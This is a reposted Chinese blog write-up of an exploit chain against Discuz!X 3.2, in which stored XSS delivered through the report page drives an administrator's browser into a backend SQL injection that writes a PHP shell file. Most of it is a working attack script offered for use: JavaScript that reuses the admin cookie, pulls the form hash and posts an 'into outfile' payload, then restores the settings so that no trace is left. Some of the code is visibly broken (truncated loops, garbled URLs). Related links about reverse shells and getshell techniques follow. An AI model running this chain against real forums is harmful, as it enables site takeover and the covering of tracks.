mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量566 收藏 2
点赞数
文章标签: mysql注入反弹
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29915703/article/details/113460595
版权
本文详细介绍了Discuz!x中存在的一种无防御的SQL注入漏洞,该漏洞可通过开启日志功能并利用XSS反弹,最终在后台获取shell。通过分析后台举报请求和SQL执行过程,展示了如何利用表单hash绕过防御,通过AJAX发送构造的请求,成功getshell。此外,还提供了利用漏洞的完整代码示例。
摘要由CSDN通过智能技术生成

### 简要描述:

Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......

### 详细说明:

首先我们开启日志功能,然后存储一个xss看看:

测试一个xss页面:

[19.png](https://images.seebug.org/upload/201409/131812301e488ed4e31092e7aee5f15fe3685837.png)

我们调到文章页面看看,是否被执行了:

[20.png](https://images.seebug.org/upload/201409/131814478814022e43a50c62dc290a1d47f8e1af.png)

下来我们看看怎样把这个发给管理员呢,底下有一个举报页面:

[21.png](https://images.seebug.org/upload/201409/13181715ecd6fb87c52092d4c4f638ce1c153fa7.png)

我们以管理员的身份看看这个后台的举报请求:

[22.png](https://images.seebug.org/upload/201409/1318185901b277d0d3840b3ab988380b0ffcfcf4.png)

这个过程我们分析完毕了,下来我们看看后台一处,无防御的sql注入:

[23.png](https://images.seebug.org/upload/201409/13182054ebd934f5c54d23c909133dbdde6c1741.png)

我们这里就不分析代码了,这里代码好曲折啊,大致思路我们给一张图,就可以看清楚

1.设置表前缀,抓包重放如下:

[24.png](https://images.seebug.org/upload/201409/131822352d654242756a85fad87f1d1b384c0310.png)

2.然后我们改一下表前缀的注入:

[25.png](https://images.seebug.org/upload/201409/13182618558ba7063112471160cdc8234b2284ed.png)

3.我们来监控一下,sql语句的执行过程,我们就明白了,这个漏洞产生的原因

a.当你第一次点击的时候,这个sql语句不会执行,然后你多提交几次,就可以了

b.数据第一次流进了这个表:

[26.png](https://images.seebug.org/upload/201409/131828503187cf8a7f7d40ee85aab3a45cc6d1cf.png)

看以看出来,做了过滤

c.但是当数据取出来的时候,这个就没有在进行转义,直接从数据库获取,所以造成漏洞:

[27.png](https://images.seebug.org/upload/201409/131830099366908d4a78eba8775db2c7d545fec1.png)

那么我们去这个目录看看是否生成了我们想要的shell:

[28.png](https://images.seebug.org/upload/201409/13183143e79b23515dc73ce3d4d234ed792b1985.png)

这么一来所有的来龙去买我们都搞清楚了,那么怎么样把这两个组合起来,因为有表单hash的存在我们怎么通过xss搞定,思路如下:

1.我们通过ajax 首先对表单页面进行一次get访问,大家都知道dz会隐藏的形式写进表单的一个字段为formhash

2.有了这个formhash的话我们就可以,再次发送ajax请求,直接发送五次然后geshell

3.有人要问为什么要发送五次,这三次分别是什么

a.第一次是get请求获取formhash

b.第二,三次是发送构造的包,因为这第一次发送,是不会成功的,它要利用上次的发包,再二次构造,所以这里面发两次才能产生shell

c.第四,五次请求就是还原人家本来的面目,这里原理是相同的

接下来看我们的代码:

我们在远端的服务器放置的js内容如下:

```

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

var formhash = '';

var cookie = document.cookie;

var _x = ajax();

request_get();

function request_get() {

src="http://192.168.10.70/Discuz_X3.2_SC_UTF8https://images.seebug.org/upload/admin.php?action=misc&operation=custommenu";

data="";

xhr_act("GET",src,data);

}

function sleep(n){

var start=new Date().getTime();

while(true) if(new Date().getTime()-start>n) break;

}

function request_post(flag) {

src="http://192.168.10.70/Discuz_X3.2_SC_UTF8https://images.seebug.org/upload/admin.php?action=setting&edit=yes";

if(flag == 1){

data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8https://images.seebug.org/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_vars union select \'<?php phpinfo()?>\' into outfile \'D:/APMSERVER/APMServ5.2.6/www/htdocs/Discuz_X3.2_SC_UTF8https://images.seebug.org/upload/data/shell.php\'#\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\næ交\r\n-----------------------------2137124919446--';

}else{

data='\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="formhash"\r\n\r\n3cf53a8d\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="scrolltop"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="anchor"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="operation"\r\n\r\nuc\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][appid]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][key]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][api]"\r\n\r\nhttp://192.168.10.70/Discuz_X3.2_SC_UTF8https://images.seebug.org/upload/uc_server\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][ip]"\r\n\r\n\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][connect]"\r\n\r\nmysql\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbhost]"\r\n\r\nlocalhost\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbuser]"\r\n\r\nroot\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbpass]"\r\n\r\n********\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbname]"\r\n\r\nultrax\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[uc][dbtablepre]"\r\n\r\npre_ucenter_\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[ucactivation]"\r\n\r\n1\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[fastactivation]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingnew[avatarmethod]"\r\n\r\n0\r\n-----------------------------2137124919446\r\nContent-Disposition: form-data; name="settingsubmit"\r\n\r\næ交\r\n-----------------------------2137124919446--';

}

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

if(_m == "GET"){

_x.open(_m,_s,false);

_x.setRequestHeader("Cookie",cookie);

_x.send();

var document_str = _x.responseText;

var basestr = 'name="formhash" value="';

var formhashpos = basestr.indexOf(basestr);

var realpos = formhashpos + basestr.length;

formhash = basestr.substr(realpos,8);

if(formhash){

var count_0 = 3;

var count_1 = 3;

for(var i=0;i

request_post(1)

sleep(1000);

for(var j=0;j

request_post(0)

}

}else{

_x.open(_m,_s,false);

_x.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------2137124919446");

_x.setRequestHeader("Cookie",cookie);

_x.send(_a);

return _x.responseText;

}

}

```

然后依照刚才的解法,我们应该在那个目录下生成了一个shell.php

[29.png](https://images.seebug.org/upload/201409/13193740199127cf09e55404d3d7d2b49515dcda.png)

最后我们的站点还是可以正常访问,不留痕迹

到此为止所有的东西已经做完.............

### 漏洞证明:

loading-bars.svg

jfgfyth
关注
【信息收集】——3、信息收集指南
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
Go-XSShell是一个XSS反向shell框架
08-14
XSShell是一个跨站点脚本的反向shell ...好吧,也许它不是一个真正的反向shell,但它允许你与XSS受害者的浏览器实时交互。
渗透学习-靶场篇-XSS之订单与shell箱子反杀
qq_43696276的博客
09-19 2657
这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子的反杀过程!!
【网络安全】使用meterpreter进行远控、Mysql注入反弹XSS攻防
KiriSoyer
11-08 456
在Win7-1(攻击机)的C:\wamp\www 目录下新建一个文件 xss_hacker.php。设置DVWA Security为“Low” 打开XSS(Reflected)输入。在Win7-2(受害主机)中打开DVWA主页 以管理员admin登陆系统。在Win7-1中使用普通用户登录 gordonb 密码 abc123。Win7-1(安装好WampServer)输入 单击submit。
网络安全-反弹shell详解(攻击,检测与防御
最新发布
2401_84466336的博客
04-23 4592
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
Discuz x3.2 xss获取管理员权限
weixin_34348805的博客
04-12 895
0x00 说说xss 跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3172
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1590
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5533
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 587
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
XSS(跨站脚本攻击)
糖小喵
04-27 610
XSS的原理和分类 原理:web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常为HTML代码和客户端JavaScript脚本)注入到网页中,当其他用户浏览这些网页的时候,就会执行其中恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 XSS分为:存储型 、反射型 、DOM型XSS 存储型XSS:存储型XSS,持久化,...
WEB攻击手段及防御第1篇-XSS
茅坤宝骏氹的博客
05-05 280
转载自 WEB攻击手段及防御第1篇-XSS概念XSS全称为Cross Site Script,即跨站点脚本攻击,XSS攻击是最为普遍且中招率最多的web攻击方式,一般攻击者通过在网页恶意植入攻击脚本来篡改网页,在用户浏览网页时就能执行恶意的操作,像html、css、img都有可能被攻击。像前不久微信貌似就中招,好像是在朋友圈发送一个带有脚本的链接,然后通过点击该链接就会弹出一个提示,虽然没有造成什...
Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞
god_Zeo的安全博客
07-14 6390
Discuz Ml v3.x 前台Getshell姿势1.漏洞描述2.原理3.影响版本4.利用过程4.getshell POC请勿用于非法用途 1.漏洞描述 Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的coo...
DZ拿shell总结
weixin_30600503的博客
01-23 783
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
笔记:XSS浅析
04-13 1986
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言利用绕过 前言 XSS分类 反射型:非持久性,需要用户点击 存储型:持久性,代码存储在服务器,访问页面就可进行攻击 dom型(反射型):客户端脚本自身的解析不对导致的安全问题 利用 1.窃取COOLIE 2.恶意跳转 3.网页挂马/权限提升 4.通过msf生成木马url,调用反弹连解payload,设置监听ip,将木马url通过存储型XSS存储到服务器上,未打补丁访问者被攻击 绕过 1.无过滤 "><scrip.
伪装discuz代码 php木马,Discuz!X系列转换工具任意代码写入漏洞 getshell
weixin_29964507的博客
03-23 453
有些论坛 可能路径放在其它目录 没有utility 直接convert等如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0post提交:a=config&source=d7.2_x2.0&submit=yes&...
discuz安装_Discuz! ML RCE漏洞 getshell 复现
weixin_39808803的博客
12-21 146
0x00 影响版本Discuz!ML是一个由http://CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区,漏洞版本如下:Discuz! ML V3.2Discuz! ML V3.3Discuz! ML V3.40x01 环境搭建使用phpstudy搭建:直接官网下载即可http://discuz.ml/download,将压缩包...
记一次实战getshell后台
派大李的博客
10-27 591
起源 今天也是在宿舍肥宅的一天~~老大突然发来一条信息,故事就开始了。 看起来似乎是个注入点,你懂的,直接神器一把梭(^o^)/ 牛逼,不愧是神器,数据出来了,Mysql数据库,不过是user低权限的,作用不大。 跑出后台账号和密码,看下网站后台吧~~ 完蛋,找把天没找着后台,扫描了一下端口,发现开放了很多端口,估计是一个站点服务器吧… 没找到利用的点getshell,不想这样就放了 找找旁站吧,看下有入口点吗。。。 找了半天发现一个可以利用的站点,发现后台登录,还没有验证码防御,直接BP爆破~~~ …半小
Java过滤器防御XSSSQL注入实战
"本文介绍了如何使用Java过滤器来防范XSS跨站脚本攻击和SQL注入攻击,通过在web.xml配置文件中定义过滤器,并编写相应的Filter实现类来拦截和处理恶意输入,保护Web应用程序的安全性。" 在Web开发中,安全性是至关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值